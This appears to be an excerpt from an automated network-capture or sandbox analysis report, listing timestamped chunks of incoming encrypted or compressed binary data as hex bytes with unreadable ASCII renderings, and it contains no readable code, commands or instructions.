                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27112INData Raw: 6f 99 8f d6 9c f8 6b a4 4d 70 ca 18 fa 30 f7 f5 46 fd f8 49 6d f4 25 11 3a 1d 8a e5 5a 18 70 5a 53 c1 b9 0c 79 7f db ac 41 26 ce a6 83 2a 1b 56 eb 31 82 bd af 9a d0 44 54 48 bf 3a b5 b4 35 93 f4 bf 9c a1 3e f7 07 3e 02 a3 f0 e1 31 1c 1f e7 63 aa af 3f 11 82 95 61 3f 2b 62 fd 56 6c 68 04 52 fe 64 6e ae 3f 98 30 f0 11 1c 77 b6 ca b4 96 20 7d 64 20 e0 5d 6f 1c 10 a0 54 59 b9 e0 f8 39 69 76 46 74 40 cb b0 90 f9 58 7a 73 22 12 f0 b2 f7 ef f7 92 b0 0b 65 98 8d 5b 63 87 52 1e f8 e5 53 00 30 74 ae 66 fe 3b c9 f2 35 19 18 68 b1 3a c4 6a 78 61 a9 58 dc 25 9a 54 47 bc 54 8a af 94 85 7d 9f 10 34 df ef 21 ed 95 79 db 4d 8a 9a 94 37 72 2c 01 83 f1 91 0e 92 fc 3b 9b 34 cf d4 a2 bb 33 41 c6 be 3e 94 b1 55 22 40 ca ed 17 ad 30 5c e8 9e 61 42 cd 36 25 97 6e ff 0e 65 73 f9
                                                                                                                                                                                                                                    Data Ascii: okMp0FIm%:ZpZSyA&*V1DTH:5>>1c?a?+bVlhRdn?0w }d ]oTY9ivFt@Xzs"e[cRS0tf;5h:jxaX%TGT}4!yM7r,;43A>U"@0\aB6%nes
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27128INData Raw: b6 5f 51 00 07 41 a1 80 5e ee ab a5 aa a3 9a a4 fa b2 a1 4b c7 df 1f 6f bb 8a 78 73 85 5b cb bc ee bb 52 dc 6e 8d a7 98 b6 96 a4 35 2f bc 33 99 aa 1a e9 ff ac 66 fa 3d 5a 02 5d 6b d1 3d ad 57 50 5d d6 28 6d 8c b8 01 ea 8e 5d 43 2b 07 48 64 39 03 e9 9b af 37 4d 75 14 ab 1f 55 90 64 f6 67 62 c1 85 8b 3b 6b 17 ac ca b3 ea 02 10 12 f1 97 9f af 49 43 e1 28 e6 39 f6 24 86 ea 25 24 fc 5c 59 8b 7c 4d d1 c1 3e a6 96 b2 57 0a 12 10 1a b0 62 64 b4 b0 8f fa aa b0 0d f2 8e c8 25 6a 4e 08 38 3a b5 ce 55 a7 6b fc 2f 91 a1 5f 10 57 c3 b8 3b ea 14 51 22 0a fd 98 4a 00 f3 d0 33 b0 00 c3 23 02 b2 7f 92 7b 6d 74 28 0d e0 fa 8c 54 f9 4e f0 c7 2f da e3 bb 01 e2 ec aa 6f d5 d1 1d 0f 4b e3 cc 72 70 ac fd 92 8f 33 1d ef 31 86 50 70 7c b7 7b e9 5d 7c 3b 0b 00 f0 8b 09 9f 61 4d f8
                                                                                                                                                                                                                                    Data Ascii: _QA^Koxs[Rn5/3f=Z]k=WP](m]C+Hd97MuUdgb;kIC(9$%$\Y|M>Wbd%jN8:Uk/_W;Q"J3#{mt(TN/oKrp31Pp|{]|;aM
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27144INData Raw: 8e 3c cd 19 77 66 7b 73 3e e2 88 eb 2d 64 6c 94 2c 5d bd a5 91 e6 8c 67 e6 f5 96 41 21 ac 1f 4a 80 6f 57 ff a0 90 b4 a0 81 88 d6 f0 bc 5e 24 e7 37 ec ef 18 3b 93 00 7d 75 83 7e e9 d7 60 a5 c2 ca b5 4d 5d c7 32 de aa fd 64 18 22 98 44 2b ca 5d 8b 3b 0a a9 8c 64 17 71 c6 1d 23 2a 11 22 50 9f 87 e9 42 0d 88 ae d6 44 fd 03 c6 ee de 88 72 93 4f 12 13 be 5d e5 9c 7a d6 17 df 0e a7 8d 72 4e 67 2c 6e 4a b1 60 98 cf cc 40 03 4e 33 c5 6a 6f 7b 42 ce 77 68 21 98 09 2d 18 1c e5 65 2e 3b 5d 25 0c 17 74 29 d8 cd 80 da 4e 54 13 45 c5 2a 3b 7e ae 4f b0 07 99 6f 81 5c 1e cb 19 b3 53 42 b1 44 f2 7c aa 28 c3 3d ef f6 7b c5 06 2d 61 7e 8d ef af 9f 03 3a 8d a5 ae c8 07 79 40 ea 12 87 80 40 b2 7a 3e 23 0d 54 fd 6f 42 84 b7 b2 d6 73 22 bb 7d 32 86 a8 9b 93 fe 32 0b b0 3d ba 1d
                                                                                                                                                                                                                                    Data Ascii: <wf{s>-dl,]gA!JoW^$7;}u~`M]2d"D+];dq#*"PBDrO]zrNg,nJ`@N3jo{Bwh!-e.;]%t)NTE*;~Oo\SBD|(={-a~:y@@z>#ToBs"}22=
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27160INData Raw: 06 b6 a0 85 92 1e 15 be f6 52 9c 03 81 72 c6 66 5b e4 1e 59 31 f9 b4 f2 55 40 04 08 6b 82 9b 3c 28 0a cd 5a f1 6a ce 19 cd cb 6c 8a 06 00 74 c5 07 0e 33 ed 97 35 37 9c 31 1b 6f 28 30 4b 1f 4f 29 8a 0a f1 89 28 11 32 af 9d 47 74 14 73 86 a4 c0 08 39 68 2c 62 2c f9 32 4d ce 9e ec 1d f3 ce 6d 63 2f aa f8 c1 40 ab 99 42 21 f9 99 3c 02 7a 9d 4a 48 7b 8a b1 ef 86 b6 94 55 0d d3 03 76 62 bb e3 e8 b4 9c 72 c2 d7 92 6e 72 67 60 c0 a0 43 84 6c b4 e7 15 70 90 5b 4f 01 17 73 9e 1e 97 12 07 6b f8 13 e1 00 ae b1 44 7c 34 0b 81 44 09 e4 8f bb 04 80 9f d8 67 c5 64 d1 47 38 64 fd 62 4b 7c a0 5e d0 29 85 2a 53 ee 4e 6b 49 5d b5 5d 8d 7c a7 4a 65 84 af fc c8 be 64 55 32 e1 14 2e c3 0b 51 7a 4c 45 dd 11 97 f1 a9 5b 35 a7 15 1c e4 98 84 8f cc 6a a3 f6 6b 93 09 5f 20 e3 9c 38
                                                                                                                                                                                                                                    Data Ascii: Rrf[Y1U@k<(Zjlt3571o(0KO)(2Gts9h,b,2Mmc/@B!<zJH{Uvbrnrg`Clp[OskD|4DgdG8dbK|^)*SNkI]]|JedU2.QzLE[5jk_ 8
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27176INData Raw: a0 a7 9b ba aa af 77 4d 23 70 5e 7b 28 9d 06 ab 38 55 2a 4a b1 a4 c6 01 51 35 d8 9f a1 7c c1 71 cb ca 2e 4f 17 3b 6d 96 9a 3c 83 13 84 0e c5 93 4c 49 40 57 92 15 de 68 ca da 0d cb a4 85 4c 33 ea 02 09 6c 45 69 51 89 2a 9d 04 da b5 e7 ad fb 41 0f 80 93 10 d1 09 a8 2d 4f ff 78 4e 4c a4 75 5b 50 3c 33 1b db c2 a0 5c e5 75 88 e4 ba e3 2d f5 ca 35 7c 49 58 34 8a 90 e4 6e c0 8c d9 6c a8 eb 8b c8 80 66 ae ff d0 5a 67 67 91 8d 6c cb 65 c1 97 d6 e3 c9 3c 74 6a fd f6 44 80 1d db c6 cb 58 4b 74 b1 38 70 d0 90 43 13 e2 a6 f1 f9 35 ff 5a 5f c3 de 19 80 e5 1e de e5 ad a8 e8 aa cf 8d 9e 8b 1b f9 8f 96 9b 25 af 35 63 10 71 f6 58 8d 19 f1 c9 f7 93 4c 54 86 19 87 4d 66 ad 29 58 eb 53 2b 4d c1 95 ac 9d 64 67 3d ac 66 db eb 50 1c a3 83 93 b3 a5 9e 8c d7 e2 ac 05 3b 12 38 f8
                                                                                                                                                                                                                                    Data Ascii: wM#p^{(8U*JQ5|q.O;m<LI@WhL3lEiQ*A-OxNLu[P<3\u-5|IX4nlfZggle<tjDXKt8pC5Z_%5cqXLTMf)XS+Mdg=fP;8
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27192INData Raw: 9b 33 a4 7b 61 7e 54 27 cc bc 63 44 5e cb b7 44 48 e5 68 19 51 c8 fc f0 7b cc ff 7b ac 75 34 07 33 15 07 2b 0c 7a 68 f2 de 62 2f f9 fc 52 ad dc 9b ac b9 bc fd 7b fe 12 9b d1 ca ab df 98 bf 35 88 1e 36 37 2a aa 35 63 ea e8 c1 64 a1 09 46 89 77 57 f2 67 3c 9e 71 9f 34 3f 17 1d f0 14 6f e5 89 11 35 98 26 5e d9 71 0c 8a ba e8 ad db 82 e4 ec 16 96 e5 d9 b3 8d ac c4 48 d5 fd cd 40 15 9b 05 68 35 61 e8 bc 7c ac 66 de cd fc 12 ff ed 69 44 9f 85 d9 be 9b 17 5d 44 8e 5e 3d f6 a4 96 65 37 dd 17 78 37 03 11 87 90 2c f5 7c 61 50 a2 37 5d 2d ff ba 6f ed da ff 0f b5 ed 45 7d 28 e1 ab c9 4f be d0 46 d7 d0 a2 2b 2c 4e 06 71 73 99 c7 0d f4 7c 72 14 ea ea be 9f 9e 33 54 81 2b 81 a9 c9 cf 30 97 2a 04 f5 7c 71 6a d5 99 ab d8 1b 99 2a 57 a1 3d a6 e0 47 7b 92 c1 52 7e b8 d9 4d
                                                                                                                                                                                                                                    Data Ascii: 3{a~T'cD^DHhQ{{u43+zhb/R{567*5cdFwWg<q4?o5&^qH@h5a|fiD]D^=e7x7,|aP7]-oE}(OF+,Nqs|r3T+0*|qj*W=G{R~M
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27208INData Raw: 8e 3a a6 4a cb a4 f5 f0 7c 6b dc a3 e9 3f 2c c9 72 32 7e 1a fd 2d 8f ac a3 03 ea 17 83 43 42 8c 74 4f 78 e0 df d0 f6 2c 94 c3 33 6c 4c 55 5f 41 38 e8 59 d5 51 08 e8 1b 2f e8 35 88 02 90 ac ae ae e6 9c 8a f5 bc 71 98 a5 b2 0f 44 c1 07 0c 7a 1e f8 d4 4e 86 e7 74 cd 94 e2 24 ab 93 c8 4d 35 0b e1 68 2e d4 72 be 3b 48 29 00 4b 39 ce 50 f1 ab dd 66 65 19 ca a9 18 d2 d4 1d 3f 8e 7f 9e 03 1f 5a 82 5e 7d 3b 84 07 29 58 d9 72 78 10 23 c8 2b 50 ee 65 14 ad 6b c0 51 43 fe 65 e0 3f 5b 33 0b f5 15 c4 a8 27 07 fb 24 89 2a 4b 05 51 39 ec 27 40 78 b9 4e 50 22 35 20 47 42 8f 2e ef 67 89 2a 65 a9 18 3c ab f1 bf 6b db 68 14 5a ec 07 46 de 6b 35 98 54 90 a4 2c f4 3d e3 83 42 57 8c e0 f9 72 7f fb d0 2f e9 e5 33 10 43 ed ae ee e7 16 5a e5 ee 9e 2f f7 02 37 ee 0f ca 3a e6 08 1d
                                                                                                                                                                                                                                    Data Ascii: :J|k?,r2~-CBtOx,3lLU_A8YQ/5qDzNt$M5h.r;H)K9Pfe?Z^};)Xrx#+PekQCe?[3'$*KQ9'@xNP"5 GB.g*e<khZFk5T,=BWr/3CZ/7:
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27224INData Raw: af 0a 30 4e a7 fa cc 52 fe 94 a0 9f e5 44 65 99 4d c2 f8 a5 24 e7 5a 84 70 96 2a ec f6 b8 2e 9d ad ac 45 bd db 3b be c0 9c 6c 7d fb 7b 84 e7 63 a0 46 86 dd f3 0a 85 ea a4 3d 7e cf 6e ff 0a 3b d5 2a e5 8b 4b ba 21 8b b3 d6 d9 37 ac 96 0d 1a 02 f7 c7 e8 58 7f 73 ba 75 8c 1b cd 0e 90 0f 73 a3 f6 a6 d2 9b db 47 e0 ef f7 20 32 2b c3 1c 65 12 4b 52 af b1 02 3e d8 bd 24 1a 94 06 c4 b3 74 23 40 7a f0 2d 7c de d1 ce 4b 95 cc 5b ec 49 fe 43 8a a0 bd 81 34 d9 ac 03 c8 7c 9b 60 7b 1c 67 48 ae 5a 5b 35 77 40 d0 a7 c0 48 3c 71 00 0e ce 39 68 9b e2 7d c3 e4 c3 7f c5 27 b8 13 2f e6 5b af 01 99 33 43 b6 95 de 76 91 49 05 15 a5 b0 03 54 0b 28 13 65 36 8b d8 d0 fe 78 d6 73 36 66 01 50 7b 7f f8 e2 3a f7 49 b5 3a a3 91 42 dd 05 13 91 da 5f e6 d7 d8 1d e9 6f 71 f9 74 bf c8 fe
                                                                                                                                                                                                                                    Data Ascii: 0NRDeM$Zp*.E;l}{cF=~n;*K!7XsusG 2+eKR>$t#@z-|K[IC4|`{gHZ[5w@H<q9h}'/[3CvIT(e6xs6fP{:I:B_oqt
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27240INData Raw: 93 f8 79 dc 1c ab 24 43 a0 5d 95 b6 0c fd c3 ee e4 ea 1f 20 3a 89 8b 23 f4 85 99 cf 79 13 7a 41 82 5a bf f6 a9 3b 66 71 6c 84 10 2d 0c 84 74 13 45 c1 98 54 65 54 fb df 69 2b e4 ac 9f 7b 6c 6f 4d 9b 34 ca e5 fd 66 ad ea dc 3c 9e 2f d4 30 45 df f8 f9 ed 8d cc c9 2a ec e6 ea 29 69 59 f0 0c 3b 8a 94 93 9f 01 3c 25 d0 53 8f 24 4d ea f2 5e 4a 9b e8 58 6d 8d bc 4c 68 91 c8 db 3c 19 1d 63 99 5f f9 53 c8 bc a3 3d d7 ed e1 19 18 bf 54 ae 86 ca dd 94 e4 02 fa 8d bf bd 14 c3 7e a8 5b 98 50 57 39 95 01 82 c3 f4 50 00 8a 4f 17 96 2d f7 9f 98 34 9e 9b cb af ea d3 13 39 ab f4 b9 f1 90 bb 78 5e 12 bd 8c 45 56 f6 57 c6 ec c5 af c1 a6 28 9e e0 ed 7c 7d 23 49 8c e2 fa 97 41 16 94 c5 11 e0 10 97 89 b6 3c 69 c6 3c 16 fe 93 dc 68 8b 6f d9 3f 1f 6b 7f 5a 9d 93 27 35 36 f4 3a 44
                                                                                                                                                                                                                                    Data Ascii: y$C] :#yzAZ;fql-tETeTi+{loM4f</0E*)iY;<%S$M^JXmLh<c_S=T~[PW9PO-49x^EVW(|}#IA<i<ho?kZ'56:D
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27256INData Raw: aa 38 c4 44 00 a6 0c e3 32 04 55 a3 0d d2 20 84 3d fe 76 af 86 f8 5b 6c 7c f0 76 a6 6f d6 93 be 9a 82 4b 1f 2f e4 4c 8b ce 72 97 48 83 8c 8e eb 8d d5 d9 88 2d 1f aa 0b 1c 9e 11 6a 6d 85 c6 7d 8b 04 95 a6 cb fb 93 72 60 6f 8a 23 14 82 fe be 92 7d 59 4b df 18 17 9c 77 5b d8 e7 ef 75 6f 89 7a 18 1d 38 96 c0 a0 fa 54 60 5c eb a1 b6 d7 21 48 f8 c3 f0 a0 a3 52 20 9b c9 5d 93 d7 7d 36 bf 5c cc 9d 7a 1d 87 54 b5 f3 a0 7c 77 68 07 77 84 7d fd d4 e9 dc 5b a8 cb 3a d0 d6 23 89 aa e6 06 6c 17 f2 49 dc 18 12 68 29 17 93 69 41 c2 de c4 ad e6 b8 30 93 cc bc ee 6b 84 a2 84 4b 3f 71 42 de 7b 50 98 a5 69 0f 1c 8b 4b de c0 8f 92 58 d1 ee 00 b2 6b a9 71 d5 1c ef 30 bd be ad e4 ab ab 80 23 f3 8c ce e4 e1 a3 53 c0 34 aa b8 67 1a cf 01 fc f4 ab 3e 9e 83 fa eb bf 33 39 fe d6 15
                                                                                                                                                                                                                                    Data Ascii: 8D2U =v[l|voK/LrH-jm}r`o#}YKw[uoz8T`\!HR ]}6\zT|whw}[:#lIh)iA0kK?qB{PiKXkq0#S4g>39
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27272INData Raw: 47 b4 66 42 ad d3 f8 24 de 76 b2 9f 67 71 07 cc 6c 40 7a 1f cb 19 5a 12 ff 7b 99 78 a3 07 e3 b2 19 6a 6d 0b 5e 2e 23 e9 f4 22 b5 16 95 95 08 98 8c 22 cd a0 64 d4 1e 34 f8 4e 7c 86 98 d9 f5 26 3d ef 2e ca a3 31 6d eb b4 8f 1e d2 10 ff 8c c2 8a 73 2a ae 81 19 7d c7 25 96 e8 d0 aa 6a 97 25 7b c9 5d c2 2a f7 e3 a6 f8 c7 22 4f 91 96 b3 16 b7 e3 c6 17 30 38 cf 9c 45 9e 37 89 71 de 55 d4 7e 17 ce a8 4a 6b ff 91 4b c7 ed 73 62 0f 18 19 c6 c2 48 7d c7 8e 7a 9e 90 8a c5 57 82 3d be 69 e0 7d c6 ef 80 84 d3 6b 12 76 ec 58 c0 cf fe 4c 45 29 b2 34 d2 b5 38 34 12 6c fa ed 9c e6 ad 39 59 11 6c 6d 14 0a 2b f8 2c 11 1b 6b 83 9b 85 83 50 d7 f5 4f 76 53 9e 54 11 ae 0c d6 8f bd 7f d2 4e ab 12 67 5a 7b 04 0c c7 19 a6 63 c6 78 3a 82 a2 04 db f8 47 f1 b8 3e bf 15 a3 8e e4 fb a9
                                                                                                                                                                                                                                    Data Ascii: GfB$vgql@zZ{xjm^.#""d4N|&=.1ms*}%j%{]*"O08E7qU~JkKsbH}zW=i}kvXLE)484l9Ylm+,kPOvSTNgZ{cx:G>
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27288INData Raw: d9 34 68 b3 01 10 55 f8 6d c5 f9 e4 04 95 f6 53 5d 90 8d 6c 65 05 79 8c 55 0a b5 bd ba d4 72 da b4 1b 07 bc 6f e9 6d 99 47 fd a0 c3 62 32 d1 85 c5 b7 20 24 d4 03 88 10 d6 e2 39 fa ca b6 16 e1 24 09 81 9d 76 a1 73 d1 4c 19 74 7f f1 42 3f f1 bb a6 78 52 c3 64 52 91 16 2b 1a ca 6e c9 9a 21 2d dd 35 14 ef db f9 f8 43 8b 5e 31 50 96 0b 58 65 38 be 30 ba 8c 92 af b7 81 ff 45 1d e5 69 1a 81 c3 cd 95 71 bd da 24 94 d1 cd 82 1e d2 cc 7f e7 d4 60 c8 f2 85 dc b2 fd 91 0b da f6 7c ef 42 e1 a4 5d af a6 1e 96 86 29 1b ad 64 96 39 5a 21 2a dd 43 e6 68 e0 2c d3 f4 be bc d1 92 3d 6a c2 78 3e 78 1e a4 9b bb 06 a6 e9 7f fd fa c2 9d 63 2f 23 0d 32 c4 7d 24 38 ef fa 40 1d c2 be 7e 0b 1f 58 a4 2b 48 7a 32 5c 41 bd ae 03 c3 b8 e8 02 af aa f6 07 ed 56 98 13 30 e6 48 24 4d ce 64
                                                                                                                                                                                                                                    Data Ascii: 4hUmS]leyUromGb2 $9$vsLtB?xRdR+n!-5C^1PXe80Eiq$`|B])d9Z!*Ch,=jx>xc/#2}$8@~X+Hz2\AV0H$Md
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27304INData Raw: 33 2b 84 a6 f1 6a 99 87 cf 39 f4 95 9a e9 dd 99 6f 50 7b ab 2c 7c c2 7b c2 c5 af fc 08 4e c6 ad 8e ad 7e 01 53 d9 41 e3 c2 bf 94 a0 23 6b 3e db 4e 57 1c 97 23 44 af 1a 3e 0f c2 26 c6 39 0c 6f 9e 25 6b 6b 0b d7 fb 31 d4 aa 07 bd b1 61 ff bb 80 7f 9e 6a e1 32 51 ee 14 82 4d 00 6c 09 7b d3 26 d9 71 b4 10 d0 15 3d 1b 80 27 d1 c4 40 24 0b 08 85 29 09 ad b1 b6 c1 00 1f f3 92 52 06 ae 94 91 1c f7 be 51 62 be 6c ce e4 16 1e f5 5a ba f1 bb cc 82 e7 bd 85 70 b5 0b 64 44 c3 7f 00 3f 2a dc 22 95 62 7b 91 ef 47 9d b1 05 d0 b5 4c b6 0c 7f 88 c6 e1 8e a8 ad c9 3a e4 bf 57 7d 70 0e 75 64 c9 9d 70 df 54 7d f4 21 f9 bd 10 b2 85 6d 2f 20 d3 93 6f 5e 33 27 c1 01 c1 55 bb d8 8e 60 09 5a bc 31 2d db 4c 28 7f 75 5f a9 e0 27 cd af e4 a6 77 d0 57 e2 6b 3b b8 dd dd 2e 7c 1c 91 0b
                                                                                                                                                                                                                                    Data Ascii: 3+j9oP{,|{N~SA#k>NW#D>&9o%kk1aj2QMl{&q='@$)RQblZpdD?*"b{GL:W}pudpT}!m/ o^3'U`Z1-L(u_'wWk;.|
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27320INData Raw: 5f 77 54 e8 d1 82 ef b3 94 c8 b7 0d 57 96 36 9f 77 89 92 0e 08 2c d8 b7 37 9c b4 90 7d c2 44 ae aa e6 ae 38 65 9d b7 aa df 97 fd 04 77 d2 b3 90 cc f7 71 13 5e 62 1d 8b 6a b9 4a 5a 1e a7 f5 95 b2 a0 24 25 d6 30 b8 a1 f5 9e dd c3 a9 c4 3e 3b a1 f5 f3 ee db 81 f1 09 f7 0b 65 e9 43 31 26 82 61 26 65 35 9d 79 9f 84 dc 08 b4 98 f6 cb a3 3d 1c 45 26 b7 d0 ca 5d ba c3 08 fb d8 b8 d1 ca 42 2a 27 12 df 4e 11 7b 88 e4 09 fc 8c 28 2c 44 37 f8 d5 db b3 c5 91 2e cf 39 fd 3b 23 41 3d a0 db b7 6d e6 44 95 0d 03 48 b4 a5 e0 15 63 c2 12 55 5e 0d 15 9f 66 a4 ea 43 7d 2b ee 7b 47 f1 82 00 20 74 da 37 80 6b d3 7e b4 a0 c0 e4 f7 75 17 04 14 1e 80 8f 77 9d db 80 a5 35 66 54 a3 3a 13 bb 7e 9e 81 59 03 d1 a6 ea 8c 01 5f 66 4c 35 ff 9d 2d 14 98 26 b2 af 5e e7 3a 4d e3 3c 08 56 ff
                                                                                                                                                                                                                                    Data Ascii: _wTW6w,7}D8ewq^bjJZ$%0>;eC1&a&e5y=E&]B*'N{(,D7.9;#A=mDHcU^fC}+{G t7k~uw5fT:~Y_fL5-&^:M<V
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27336INData Raw: 82 b5 14 cd 3e 70 bb 3a 16 99 46 e2 32 f5 2b f5 01 01 e9 34 db 4a d3 13 9a 4a 52 a5 5b 37 09 70 d6 87 28 48 0e c2 b1 70 ff fa 33 18 51 9e dd 01 1a b6 a9 ee b7 24 22 b3 67 4f 42 97 43 9f ff da 41 e7 cc c1 33 37 b2 50 58 4d 33 20 63 4d 5d cd e6 e5 7c c6 5d 2a 78 46 ec c4 19 06 af 53 65 4a a6 67 5f 75 a6 ff 51 d0 87 66 68 9e 91 f7 af 3b 68 2b cf a9 73 64 55 70 35 fa cb da 64 93 f8 e2 a1 6f 25 a8 46 6c 0b 73 cf 49 7c 3f c6 c9 8c 69 3b 6c 9b 5d 90 0d bf 81 3c 2e 8a 66 51 0d 8b a9 ae 17 8c 1d ca 53 b9 35 dd 04 49 2b 64 8f 4f 21 70 1e 16 13 7f 03 cd b5 ae 19 b1 6e 65 0d e2 f4 7d 51 9e 4b ea 0b 1d 54 d8 f5 12 a6 46 a9 8e ee 8b c2 1c 48 13 23 0d 51 dd 29 26 a2 c4 ad d4 7c 87 3f c7 18 ad 15 f7 67 b2 af be c0 59 92 6d 8e 4b a6 6d ed cb 80 d7 a1 32 f1 3d ee d1 1a f7
                                                                                                                                                                                                                                    Data Ascii: >p:F2+4JJR[7p(Hp3Q$"gOBCA37PXM3 cM]|]*xFSeJg_uQfh;h+sdUp5do%FlsI|?i;l]<.fQS5I+dO!pne}QKTFH#Q)&|?gYmKm2=
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27352INData Raw: ed 6a d2 e0 3a 97 a5 d9 f8 0e 71 fc 25 15 03 2d 7b 3a 54 de 6a d1 ce e7 ac f7 43 2b a5 24 43 47 be ef 7a 83 ad d7 f5 a7 67 71 ff 86 f0 a0 88 ec c3 44 89 c7 29 63 03 c8 b9 5b 41 f7 b5 2a 1b 9b b1 5a 53 38 08 e5 22 78 0a f3 a2 50 c0 f2 63 ad 42 0a 0a c4 e4 e0 cc 6b f7 8c 32 fa ed bd d4 83 aa ef fd 3f f5 7b 9d 0b f8 d1 cf 16 95 01 6c 81 a7 c7 48 09 de 72 d9 7b 48 dd 8b 93 7b fa e8 7f 00 3e 0c cc 79 fa 7b a2 f4 72 93 2f 50 3e b6 f9 cf b0 23 99 77 c8 96 2f 2a 69 83 46 4f b8 c0 95 ef 3a ab 58 3a 7e a0 60 28 5c 04 1b 62 24 ff ee 76 a5 e4 21 28 56 81 03 54 e4 d6 63 6c 6d af eb da 1d 8e e6 94 18 77 ad 19 17 da e4 2d b4 be ca 09 0a c8 bb 46 18 59 95 61 09 9b bc 12 bc 8f 9e 41 d6 53 ae 7b ec 09 84 b0 6d f4 23 44 e4 a3 23 7c 61 18 ee 5e 5c 37 eb 20 e6 2d 7b 4f 09 21
                                                                                                                                                                                                                                    Data Ascii: j:q%-{:TjC+$CGzgqD)c[A*ZS8"xPcBk2?{lHr{H{>y{r/P>#w/*iFO:X:~`(\b$v!(VTclmw-FYaAS{m#D#|a^\7 -{O!
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27368INData Raw: e7 94 54 5f 1e ac 87 05 a4 bc 99 ec 72 08 2d 3d a8 76 14 14 42 32 ee 05 92 ff 86 86 5d 95 22 32 f1 7f 9b 6a a2 a5 75 79 55 fa 5a 16 25 4c 25 1c ba 50 32 27 d0 dd 59 0d 10 77 2b 98 85 59 dc 57 ab 1e fd 77 b2 1c e7 5d f7 cf fb 19 bc 3b c8 bf 98 bb 30 af c7 71 63 d3 f8 f7 ba e0 80 0d 33 67 6b de 24 8d 59 18 e0 9d c5 fb 3c 20 20 3d 0f ab ca 68 7d e9 76 41 04 af c6 21 48 14 97 cb a3 cb 71 87 93 b1 24 07 e6 fc 04 d4 50 60 bb c2 8a eb a1 fc ea b9 ee 6f 59 e3 b0 d3 75 f3 48 f8 c0 9a 08 7f 14 e2 a4 d4 fa d0 9c fa a8 d3 b9 3f cb f5 df ef 2d d9 f5 ab e9 75 6b 2d 95 b1 02 24 1e 55 8c e0 20 b0 2a 68 9f 4a 6e 07 ce 8b 17 92 bc 2d 22 10 d0 48 a1 81 ee 58 e0 d9 5a b6 24 2d cf ac 21 1a fc 1e 14 58 c8 27 af 6b 03 57 ed a9 45 6f e7 a4 5a 3e cc 0b 79 b8 d3 68 2d 34 fa e1 48
                                                                                                                                                                                                                                    Data Ascii: T_r-=vB2]"2juyUZ%L%P2'Yw+YWw];0qc3gk$Y< =h}vA!Hq$P`oYuH?-uk-$U *hJn-"HXZ$-!X'kWEoZ>yh-4H
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27384INData Raw: 3e cb f2 eb 71 7e bc a4 90 5a 55 84 ca 85 d4 85 94 9e c9 ff cf 68 08 3f ab 30 87 c7 a8 8e d6 c6 ec ec f5 5b 43 a1 36 66 fc 14 4d b9 88 b5 52 42 0c 10 f5 50 ad a2 10 32 e6 17 8d 05 19 20 a7 74 3d fb 0c 7b df d1 d5 39 19 2b e9 d8 40 bf 5e 1a ec 5d d4 cc f1 c5 85 d0 73 89 d2 b9 b6 e0 b1 c3 66 93 47 e0 a3 75 87 90 bf 77 43 fa d4 10 15 15 1a 22 b2 fe ee be e8 af 92 cc aa ea e2 63 85 75 7a fc 87 08 9b be 9d 76 15 b7 cc 7d ce a9 69 69 7b 11 08 5f 15 6a ed 67 0a 52 4b 8a 3a 4c 01 43 a1 27 49 9b c3 81 57 5f 55 9c fa d6 a9 ae 11 35 61 3a c3 d8 1b ed 30 a6 8f 75 62 61 b8 20 35 97 f4 24 45 8c 02 63 c9 52 31 12 74 51 b0 fd c4 fe 9d 15 41 78 12 d9 77 da e1 17 45 c1 06 3b 8c cb 2a 7d e7 7f e0 f7 02 3d 4b 6e 9b d5 98 0a 5c 44 7b 0b 52 5d 9e c3 0b 0e 97 bf 64 dd f7 85 6b
                                                                                                                                                                                                                                    Data Ascii: >q~ZUh?0[C6fMRBP2 t={9+@^]sfGuwC"cuzv}ii{_jgRK:LC'IW_U5a:0uba 5$EcR1tQAxwE;*}=Kn\D{R]dk
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27400INData Raw: 05 8a 16 4f ae 80 2c 5d 7e 76 0e 19 61 35 61 0f f4 d6 05 17 94 71 b4 cd f1 49 03 65 df a5 64 84 49 d9 b4 45 c1 30 b9 7f 13 e6 f0 8f 8d 37 20 a9 e7 18 66 fb 1f c3 ed 40 bc b6 97 96 1a 99 e8 9b ef 0a 2a 22 d5 a1 a4 6b 67 2e 86 10 3f bd f5 50 be f3 6c 0a d7 6a e9 a2 c9 f2 49 27 32 c7 f6 af 56 ad ee d2 23 d4 55 5e 96 d2 ae e1 b8 18 47 d3 d8 89 36 4c 9e 7c e8 c8 94 9a 8a 3c 79 bd ff 56 f8 97 32 40 84 ed 38 18 3b 0c e0 43 30 68 c0 0f ef 40 9c 75 d3 de 8a 55 29 58 90 ac 88 7b 34 4d 56 28 3d 8b a0 72 01 19 cc b8 54 b1 9e da 1d b8 a4 11 27 22 b8 d9 4a fc d5 bb 3c df ba d4 fc 05 7b f4 9f af 3f 9c 66 3a f3 7b 79 d2 ce 4d b5 cc f2 45 df ec e2 48 ee d9 c2 ff 41 fc 32 89 94 bc 3b 70 55 76 d7 5f 3f 25 e5 81 ac 31 8c 19 02 39 8b 30 38 73 0f a5 11 5e 05 d6 9f 22 b9 d0 f0
                                                                                                                                                                                                                                    Data Ascii: O,]~va5aqIedIE07 f@*"kg.?PljI'2V#U^G6L|<yV2@8;C0h@uU)X{4MV(=rT'"J<{?f:{yMEHA2;pUv_?%1908s^"
